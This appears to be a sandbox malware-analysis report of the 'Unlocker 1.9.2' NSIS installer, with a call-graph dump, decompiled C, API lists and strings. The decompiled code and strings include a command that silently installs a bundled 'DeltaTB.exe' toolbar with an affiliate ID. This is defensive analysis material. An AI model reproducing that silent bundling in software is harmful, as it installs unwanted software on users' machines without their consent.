3828 403d68 SendMessageA 3822->3828 3827 404d7b 25 API calls 3823->3827 3830 403d8f 19 API calls 3824->3830 3825->3824 3829 4059ff 18 API calls 3826->3829 3827->3822 3828->3811 3831 405153 AppendMenuA 3829->3831 3832 404fe4 3830->3832 3833 405166 GetWindowRect 3831->3833 3834 405179 3831->3834 3835 405021 GetDlgItem SendMessageA 3832->3835 3836 404fed ShowWindow 3832->3836 3837 405182 TrackPopupMenu 3833->3837 3834->3837 3835->3821 3840 405048 SendMessageA SendMessageA 3835->3840 3838 405010 3836->3838 3839 405003 ShowWindow 3836->3839 3837->3821 3841 4051a0 3837->3841 3848 403dc4 SendMessageA 3838->3848 3839->3838 3840->3821 3842 4051bc SendMessageA 3841->3842 3842->3842 3844 4051d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3842->3844 3845 4051fb SendMessageA 3844->3845 3845->3845 3846 40521c GlobalUnlock SetClipboardData CloseClipboard 3845->3846 3846->3821 3847->3808 3848->3835 3849->3807 3851 403d75 SendMessageA 3850->3851 3852 403d6f 3850->3852 3851->3809 3852->3851 4307 402b3b 4308 402b63 4307->4308 4309 402b4a SetTimer 4307->4309 4310 402bb8 4308->4310 4311 402b7d MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4308->4311 4309->4308 4311->4310 3882 4038bc 3883 4038d4 3882->3883 3884 403a0f 3882->3884 3883->3884 3885 4038e0 3883->3885 3886 403a20 GetDlgItem GetDlgItem 3884->3886 3887 403a60 3884->3887 3888 4038eb SetWindowPos 3885->3888 3889 4038fe 3885->3889 3890 403d8f 19 API calls 3886->3890 3891 403aba 3887->3891 3899 401389 2 API calls 3887->3899 3888->3889 3892 403903 ShowWindow 3889->3892 3893 40391b 3889->3893 3894 403a4a KiUserCallbackDispatcher 3890->3894 3895 403ddb SendMessageA 3891->3895 3913 403a0a 3891->3913 3892->3893 3896 403923 DestroyWindow 3893->3896 3897 40393d 3893->3897 3898 40140b 2 API calls 3894->3898 3909 403acc 3895->3909 3949 403d18 3896->3949 3900 403942 SetWindowLongA 3897->3900 3901 403953 3897->3901 3898->3887 3902 403a92 3899->3902 3900->3913 3905 4039ca 3901->3905 3906 40395f GetDlgItem 3901->3906 3902->3891 3907 
403a96 SendMessageA 3902->3907 3903 40140b 2 API calls 3903->3909 3904 403d1a DestroyWindow KiUserCallbackDispatcher 3904->3949 3912 403df6 8 API calls 3905->3912 3910 403972 SendMessageA IsWindowEnabled 3906->3910 3911 40398f 3906->3911 3907->3913 3908 403d49 ShowWindow 3908->3913 3909->3903 3909->3904 3909->3913 3914 4059ff 18 API calls 3909->3914 3923 403d8f 19 API calls 3909->3923 3925 403d8f 19 API calls 3909->3925 3940 403c5a KiUserCallbackDispatcher 3909->3940 3910->3911 3910->3913 3915 40399c 3911->3915 3916 4039e3 SendMessageA 3911->3916 3917 4039af 3911->3917 3924 403994 3911->3924 3912->3913 3914->3909 3915->3916 3915->3924 3916->3905 3919 4039b7 3917->3919 3920 4039cc 3917->3920 3918 403d68 SendMessageA 3918->3905 3921 40140b 2 API calls 3919->3921 3922 40140b 2 API calls 3920->3922 3921->3924 3922->3924 3923->3909 3924->3905 3924->3918 3926 403b47 GetDlgItem 3925->3926 3927 403b64 ShowWindow KiUserCallbackDispatcher 3926->3927 3928 403b5c 3926->3928 3950 403db1 KiUserCallbackDispatcher 3927->3950 3928->3927 3930 403b8e KiUserCallbackDispatcher 3933 403ba2 3930->3933 3931 403ba7 GetSystemMenu EnableMenuItem SendMessageA 3932 403bd7 SendMessageA 3931->3932 3931->3933 3932->3933 3933->3931 3951 403dc4 SendMessageA 3933->3951 3952 4059dd lstrcpynA 3933->3952 3936 403c05 lstrlenA 3937 4059ff 18 API calls 3936->3937 3938 403c16 SetWindowTextA 3937->3938 3939 401389 2 API calls 3938->3939 3939->3909 3941 403c74 CreateDialogParamA 3940->3941 3940->3949 3942 403ca7 3941->3942 3941->3949 3943 403d8f 19 API calls 3942->3943 3944 403cb2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3943->3944 3945 401389 2 API calls 3944->3945 3946 403cf8 3945->3946 3946->3913 3947 403d00 ShowWindow 3946->3947 3948 403ddb SendMessageA 3947->3948 3948->3949 3949->3908 3949->3913 3950->3930 3951->3933 3952->3936 4312 40263e 4313 4029f6 18 API calls 4312->4313 4314 402645 FindFirstFileA 4313->4314 4315 402668 4314->4315 4316 402658 4314->4316 4317 40266f 4315->4317 4320 40593b 
wsprintfA 4315->4320 4321 4059dd lstrcpynA 4317->4321 4320->4317 4321->4316 4322 4024be 4323 4024c3 4322->4323 4324 4024d4 4322->4324 4325 4029d9 18 API calls 4323->4325 4326 4029f6 18 API calls 4324->4326 4328 4024ca 4325->4328 4327 4024db lstrlenA 4326->4327 4327->4328 4329 4024fa WriteFile 4328->4329 4330 40265c 4328->4330 4329->4330

Control-flow Graph

[Figure: control-flow graph beginning at 4030cb; legend: Executed, Not Executed]
C-Code - Quality: 81%
_entry_() {
	struct _SHFILEINFOA _v360;
	struct _SECURITY_ATTRIBUTES* _v376;
	char _v380;
	CHAR* _v384;
	char _v392;
	int _v396;
	int _v400;
	signed int _v404;
	CHAR* _v408;
	int _v412;
	struct _SECURITY_ATTRIBUTES* _v416;
	struct _SECURITY_ATTRIBUTES* _v424;
	void* _v432;
	int _t34;
	CHAR* _t39;
	char* _t42;
	signed int _t44;
	void* _t48;
	int _t50;
	signed int _t51;
	signed int _t54;
	int _t55;
	signed int _t59;
	intOrPtr _t70;
	intOrPtr _t76;
	void* _t78;
	void* _t88;
                                                                                                                                                              				void* _t90;
                                                                                                                                                              				char* _t95;
                                                                                                                                                              				signed int _t96;
                                                                                                                                                              				void* _t97;
                                                                                                                                                              				signed int _t98;
                                                                                                                                                              				signed int _t99;
                                                                                                                                                              				signed int _t102;
                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                              				signed int _t105;
                                                                                                                                                              				intOrPtr _t112;
                                                                                                                                                              				char _t119;
                                                                                                                                                              
                                                                                                                                                              				_v376 = 0;
                                                                                                                                                              				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                              				_t98 = 0;
                                                                                                                                                              				_v380 = 0x20;
                                                                                                                                                              				__imp__#17();
                                                                                                                                                              				_t34 = SetErrorMode(0x8001); // executed
                                                                                                                                                              				__imp__OleInitialize(0); // executed
                                                                                                                                                              				 *0x423f38 = _t34;
                                                                                                                                                              				 *0x423e84 = E00405CFF(8);
                                                                                                                                                              				SHGetFileInfoA(0x41f430, 0,  &_v360, 0x160, 0); // executed
                                                                                                                                                              				E004059DD("Unlocker 1.9.2 Setup", "NSIS Error");
                                                                                                                                                              				_t39 = GetCommandLineA();
                                                                                                                                                              				_t95 = "\"C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe\"";
                                                                                                                                                              				E004059DD(_t95, _t39);
                                                                                                                                                              				 *0x423e80 = GetModuleHandleA(0);
                                                                                                                                                              				_t42 = _t95;
                                                                                                                                                              				if("\"C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe\"" == 0x22) {
                                                                                                                                                              					_v404 = 0x22;
                                                                                                                                                              					_t42 =  &M00429001;
                                                                                                                                                              				}
                                                                                                                                                              				_t44 = CharNextA(E004054FB(_t42, _v404));
                                                                                                                                                              				_v404 = _t44;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t90 =  *_t44;
                                                                                                                                                              					_t108 = _t90;
                                                                                                                                                              					if(_t90 == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t90 - 0x20;
                                                                                                                                                              					if(_t90 != 0x20) {
                                                                                                                                                              						L5:
                                                                                                                                                              						__eflags =  *_t44 - 0x22;
                                                                                                                                                              						_v404 = 0x20;
                                                                                                                                                              						if( *_t44 == 0x22) {
                                                                                                                                                              							_t44 = _t44 + 1;
                                                                                                                                                              							__eflags = _t44;
                                                                                                                                                              							_v404 = 0x22;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *_t44 - 0x2f;
                                                                                                                                                              						if( *_t44 != 0x2f) {
                                                                                                                                                              							L15:
                                                                                                                                                              							_t44 = E004054FB(_t44, _v404);
                                                                                                                                                              							__eflags =  *_t44 - 0x22;
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_t44 = _t44 + 1;
                                                                                                                                                              								__eflags = _t44;
                                                                                                                                                              							}
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t44 = _t44 + 1;
                                                                                                                                                              							__eflags =  *_t44 - 0x53;
                                                                                                                                                              							if( *_t44 == 0x53) {
                                                                                                                                                              								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                                                                                                                                              								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                                                                                                                                              									_t98 = _t98 | 0x00000002;
                                                                                                                                                              									__eflags = _t98;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *_t44 - 0x4352434e;
                                                                                                                                                              							if( *_t44 == 0x4352434e) {
                                                                                                                                                              								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                                                                                                                                              								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                                                                                                                                              									_t98 = _t98 | 0x00000004;
                                                                                                                                                              									__eflags = _t98;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                                                                                                                                              							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                                                                                                                                              								 *((intOrPtr*)(_t44 - 2)) = 0;
                                                                                                                                                              								_t45 = _t44 + 2;
                                                                                                                                                              								__eflags = _t44 + 2;
                                                                                                                                                              								E004059DD("C:\\Program Files\\Unlocker", _t45);
                                                                                                                                                              								L20:
                                                                                                                                                              								_t104 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                                                                                              								GetTempPathA(0x400, _t104);
                                                                                                                                                              								_t48 = E00403097(_t108);
                                                                                                                                                              								_t109 = _t48;
                                                                                                                                                              								if(_t48 != 0) {
                                                                                                                                                              									L22:
                                                                                                                                                              									DeleteFileA("1033"); // executed
                                                                                                                                                              									_t50 = E00402C22(_t110, _t98); // executed
                                                                                                                                                              									_v412 = _t50;
                                                                                                                                                              									if(_t50 != 0) {
                                                                                                                                                              										L32:
                                                                                                                                                              										ExitProcess(); // executed
                                                                                                                                                              										__imp__OleUninitialize(); // executed
                                                                                                                                                              										if(_v404 == 0) {
                                                                                                                                                              											__eflags =  *0x423f14; // 0x0
                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                              												_t105 = E00405CFF(3);
                                                                                                                                                              												_t99 = E00405CFF(4);
                                                                                                                                                              												_t54 = E00405CFF(5);
                                                                                                                                                              												__eflags = _t105;
                                                                                                                                                              												_t96 = _t54;
                                                                                                                                                              												if(_t105 != 0) {
                                                                                                                                                              													__eflags = _t99;
                                                                                                                                                              													if(_t99 != 0) {
                                                                                                                                                              														__eflags = _t96;
                                                                                                                                                              														if(_t96 != 0) {
                                                                                                                                                              															_t59 =  *_t105(GetCurrentProcess(), 0x28,  &_v392);
                                                                                                                                                              															__eflags = _t59;
                                                                                                                                                              															if(_t59 != 0) {
                                                                                                                                                              																 *_t99(0, "SeShutdownPrivilege",  &_v396);
                                                                                                                                                              																_v412 = 1;
                                                                                                                                                              																_v400 = 2;
                                                                                                                                                              																 *_t96(_v416, 0,  &_v412, 0, 0, 0);
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												_t55 = ExitWindowsEx(2, 0);
                                                                                                                                                              												__eflags = _t55;
                                                                                                                                                              												if(_t55 == 0) {
                                                                                                                                                              													E0040140B(9);
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											_t51 =  *0x423f2c; // 0xffffffff
                                                                                                                                                              											__eflags = _t51 - 0xffffffff;
                                                                                                                                                              											if(_t51 != 0xffffffff) {
                                                                                                                                                              												_v396 = _t51;
                                                                                                                                                              											}
                                                                                                                                                              											ExitProcess(_v396);
                                                                                                                                                              										}
                                                                                                                                                              										E0040529E(_v404, 0x200010);
                                                                                                                                                              										ExitProcess(2);
                                                                                                                                                              									}
                                                                                                                                                              									_t112 =  *0x423e9c; // 0x0
                                                                                                                                                              									if(_t112 == 0) {
                                                                                                                                                              										L31:
                                                                                                                                                              										 *0x423f2c =  *0x423f2c | 0xffffffff;
                                                                                                                                                              										_v400 = E00403526();
                                                                                                                                                              										goto L32;
                                                                                                                                                              									}
                                                                                                                                                              									_t102 = E004054FB(_t95, 0);
                                                                                                                                                              									while(_t102 >= _t95) {
                                                                                                                                                              										__eflags =  *_t102 - 0x3d3f5f20;
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										_t102 = _t102 - 1;
                                                                                                                                                              										__eflags = _t102;
                                                                                                                                                              									}
                                                                                                                                                              									_t114 = _t102 - _t95;
                                                                                                                                                              									_v408 = "Error launching installer";
                                                                                                                                                              									if(_t102 < _t95) {
                                                                                                                                                              										lstrcatA(_t104, "~nsu.tmp");
                                                                                                                                                              										_t100 = "C:\\Users\\jones\\Desktop";
                                                                                                                                                              										if(lstrcmpiA(_t104, "C:\\Users\\jones\\Desktop") == 0) {
                                                                                                                                                              											goto L32;
                                                                                                                                                              										}
                                                                                                                                                              										CreateDirectoryA(_t104, 0);
                                                                                                                                                              										SetCurrentDirectoryA(_t104);
                                                                                                                                                              										_t119 = "C:\\Program Files\\Unlocker"; // 0x43
                                                                                                                                                              										if(_t119 == 0) {
                                                                                                                                                              											E004059DD("C:\\Program Files\\Unlocker", _t100);
                                                                                                                                                              										}
                                                                                                                                                              										E004059DD(0x424000, _v396);
                                                                                                                                                              										"\"C:\\Users\\jones\\AppData\\Local\\Temp\\DeltaTB.exe\" /aflt=babsst /babTrack=\"affID=122471\" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt" = 0x41;
                                                                                                                                                              										_t97 = 0x1a;
                                                                                                                                                              										do {
                                                                                                                                                              											_t70 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              											E004059FF(0, _t97, 0x41f030, 0x41f030,  *((intOrPtr*)(_t70 + 0x120)));
                                                                                                                                                              											DeleteFileA(0x41f030);
                                                                                                                                                              											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe", 0x41f030, 1) != 0) {
                                                                                                                                                              												_push(0);
                                                                                                                                                              												_push(0x41f030);
                                                                                                                                                              												E0040572B();
                                                                                                                                                              												_t76 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              												E004059FF(0, _t97, 0x41f030, 0x41f030,  *((intOrPtr*)(_t76 + 0x124)));
                                                                                                                                                              												_t78 = E0040523D(0x41f030);
                                                                                                                                                              												if(_t78 != 0) {
                                                                                                                                                              													CloseHandle(_t78);
                                                                                                                                                              													_v416 = 0;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											"\"C:\\Users\\jones\\AppData\\Local\\Temp\\DeltaTB.exe\" /aflt=babsst /babTrack=\"affID=122471\" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt" =  &("\"C:\\Users\\jones\\AppData\\Local\\Temp\\DeltaTB.exe\" /aflt=babsst /babTrack=\"affID=122471\" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt"[1]);
                                                                                                                                                              											_t97 = _t97 - 1;
                                                                                                                                                              										} while (_t97 != 0);
                                                                                                                                                              										_push(0);
                                                                                                                                                              										_push(_t104);
                                                                                                                                                              										E0040572B();
                                                                                                                                                              										goto L32;
                                                                                                                                                              									}
                                                                                                                                                              									 *_t102 = 0;
                                                                                                                                                              									_t103 = _t102 + 4;
                                                                                                                                                              									if(E004055B1(_t114, _t102 + 4) == 0) {
                                                                                                                                                              										goto L32;
                                                                                                                                                              									}
                                                                                                                                                              									E004059DD("C:\\Program Files\\Unlocker", _t103);
                                                                                                                                                              									E004059DD("C:\\Program Files\\Unlocker", _t103);
                                                                                                                                                              									_v424 = 0;
                                                                                                                                                              									goto L31;
                                                                                                                                                              								}
                                                                                                                                                              								GetWindowsDirectoryA(_t104, 0x3fb);
                                                                                                                                                              								lstrcatA(_t104, "\\Temp");
                                                                                                                                                              								_t88 = E00403097(_t109);
                                                                                                                                                              								_t110 = _t88;
                                                                                                                                                              								if(_t88 == 0) {
                                                                                                                                                              									goto L32;
                                                                                                                                                              								}
                                                                                                                                                              								goto L22;
                                                                                                                                                              							}
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L4;
                                                                                                                                                              					}
                                                                                                                                                              					do {
                                                                                                                                                              						L4:
                                                                                                                                                              						_t44 = _t44 + 1;
                                                                                                                                                              						__eflags =  *_t44 - 0x20;
                                                                                                                                                              					} while ( *_t44 == 0x20);
                                                                                                                                                              					goto L5;
                                                                                                                                                              				}
                                                                                                                                                              				goto L20;
                                                                                                                                                              			}









































                                                                                                                                                              0x004032dc
                                                                                                                                                              0x004032dc
                                                                                                                                                              0x00403252
                                                                                                                                                              0x00403258
                                                                                                                                                              0x004032a7
                                                                                                                                                              0x004032a7
                                                                                                                                                              0x004032b3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004032b3
                                                                                                                                                              0x00403261
                                                                                                                                                              0x0040326e
                                                                                                                                                              0x00403265
                                                                                                                                                              0x0040326b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040326d
                                                                                                                                                              0x0040326d
                                                                                                                                                              0x0040326d
                                                                                                                                                              0x00403272
                                                                                                                                                              0x00403274
                                                                                                                                                              0x0040327c
                                                                                                                                                              0x004032e8
                                                                                                                                                              0x004032ed
                                                                                                                                                              0x004032fc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403300
                                                                                                                                                              0x00403307
                                                                                                                                                              0x0040330d
                                                                                                                                                              0x00403313
                                                                                                                                                              0x0040331b
                                                                                                                                                              0x0040331b
                                                                                                                                                              0x00403329
                                                                                                                                                              0x00403330
                                                                                                                                                              0x00403339
                                                                                                                                                              0x0040333f
                                                                                                                                                              0x0040333f
                                                                                                                                                              0x0040334b
                                                                                                                                                              0x00403351
                                                                                                                                                              0x0040335b
                                                                                                                                                              0x0040336f
                                                                                                                                                              0x00403370
                                                                                                                                                              0x00403371
                                                                                                                                                              0x00403376
                                                                                                                                                              0x00403382
                                                                                                                                                              0x00403388
                                                                                                                                                              0x0040338f
                                                                                                                                                              0x00403392
                                                                                                                                                              0x00403398
                                                                                                                                                              0x00403398
                                                                                                                                                              0x0040338f
                                                                                                                                                              0x0040339c
                                                                                                                                                              0x004033a2
                                                                                                                                                              0x004033a2
                                                                                                                                                              0x004033a5
                                                                                                                                                              0x004033a6
                                                                                                                                                              0x004033a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004033a7
                                                                                                                                                              0x0040327e
                                                                                                                                                              0x00403280
                                                                                                                                                              0x0040328b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403293
                                                                                                                                                              0x0040329e
                                                                                                                                                              0x004032a3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004032a3
                                                                                                                                                              0x0040321f
                                                                                                                                                              0x0040322b
                                                                                                                                                              0x00403230
                                                                                                                                                              0x00403235
                                                                                                                                                              0x00403237
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403237
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004031d4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00403189
                                                                                                                                                              0x00403189
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • #17.COMCTL32 ref: 004030EA
                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004030FC
                                                                                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
                                                                                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,Unlocker 1.9.2 Setup,NSIS Error), ref: 004059EA
                                                                                                                                                              • GetCommandLineA.KERNEL32(Unlocker 1.9.2 Setup,NSIS Error), ref: 00403139
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 0040314C
                                                                                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000020), ref: 00403177
                                                                                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                                                                                                                                              • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 004032B7
                                                                                                                                                              • OleUninitialize.OLE32(00000000), ref: 004032BC
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004032DC
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,00000000), ref: 004032E8
                                                                                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,00000000), ref: 004032F4
                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                                                                                                                                              • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                                                                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\Unlocker1.9.2.exe,0041F030,00000001), ref: 00403365
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403446
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                              • String ID: /D=$ _?=$"$"C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt$"C:\Users\user\Desktop\Unlocker1.9.2.exe"$1033$C:\Program Files\Unlocker$C:\Program Files\Unlocker$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Unlocker1.9.2.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$Unlocker 1.9.2 Setup$\Temp$~nsu.tmp
                                                                                                                                                              • API String ID: 553446912-2407670037
                                                                                                                                                              • Opcode ID: a19d3eb581d25ceee7db0395522459586b67666d40a4dd21a24ca1e1399dfb9b
                                                                                                                                                              • Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
                                                                                                                                                              • Opcode Fuzzy Hash: a19d3eb581d25ceee7db0395522459586b67666d40a4dd21a24ca1e1399dfb9b
                                                                                                                                                              • Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00404EB9(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				struct tagRECT _v28;
                                                                                                                                                              				void* _v36;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				int _v44;
                                                                                                                                                              				int _v48;
                                                                                                                                                              				signed int _v52;
                                                                                                                                                              				int _v56;
                                                                                                                                                              				void* _v60;
                                                                                                                                                              				void* _v68;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				long _t87;
                                                                                                                                                              				unsigned int _t92;
                                                                                                                                                              				unsigned int _t93;
                                                                                                                                                              				int _t94;
                                                                                                                                                              				int _t95;
                                                                                                                                                              				long _t98;
                                                                                                                                                              				void* _t101;
                                                                                                                                                              				intOrPtr _t112;
                                                                                                                                                              				void* _t120;
                                                                                                                                                              				intOrPtr _t123;
                                                                                                                                                              				struct HWND__* _t127;
                                                                                                                                                              				int _t149;
                                                                                                                                                              				int _t150;
                                                                                                                                                              				struct HWND__* _t154;
                                                                                                                                                              				struct HWND__* _t158;
                                                                                                                                                              				struct HMENU__* _t160;
                                                                                                                                                              				long _t162;
                                                                                                                                                              				void* _t163;
                                                                                                                                                              				short* _t164;
                                                                                                                                                              
                                                                                                                                                              				_t154 =  *0x423664; // 0x403f4
                                                                                                                                                              				_t149 = 0;
                                                                                                                                                              				_v8 = _t154;
                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                              					__eflags = _a8 - 0x405;
                                                                                                                                                              					if(_a8 == 0x405) {
                                                                                                                                                              						_t120 = CreateThread(0, 0, E00404E4D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                                                                                              						CloseHandle(_t120);
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _a8 - 0x111;
                                                                                                                                                              					if(_a8 != 0x111) {
                                                                                                                                                              						L17:
                                                                                                                                                              						__eflags = _a8 - 0x404;
                                                                                                                                                              						if(_a8 != 0x404) {
                                                                                                                                                              							L25:
                                                                                                                                                              							__eflags = _a8 - 0x7b;
                                                                                                                                                              							if(_a8 != 0x7b) {
                                                                                                                                                              								goto L20;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a12 - _t154;
                                                                                                                                                              							if(_a12 != _t154) {
                                                                                                                                                              								goto L20;
                                                                                                                                                              							}
                                                                                                                                                              							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                                                                                                                              							__eflags = _t87 - _t149;
                                                                                                                                                              							_a8 = _t87;
                                                                                                                                                              							if(_t87 <= _t149) {
                                                                                                                                                              								L37:
                                                                                                                                                              								return 0;
                                                                                                                                                              							}
                                                                                                                                                              							_t160 = CreatePopupMenu();
                                                                                                                                                              							AppendMenuA(_t160, _t149, 1, E004059FF(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                                                                                                                              							_t92 = _a16;
                                                                                                                                                              							__eflags = _t92 - 0xffffffff;
                                                                                                                                                              							if(_t92 != 0xffffffff) {
                                                                                                                                                              								_t150 = _t92;
                                                                                                                                                              								_t93 = _t92 >> 0x10;
                                                                                                                                                              								__eflags = _t93;
                                                                                                                                                              								_t94 = _t93;
                                                                                                                                                              							} else {
                                                                                                                                                              								GetWindowRect(_t154,  &_v28);
                                                                                                                                                              								_t150 = _v28.left;
                                                                                                                                                              								_t94 = _v28.top;
                                                                                                                                                              							}
                                                                                                                                                              							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                                                                                                                              							_t162 = 1;
                                                                                                                                                              							__eflags = _t95 - 1;
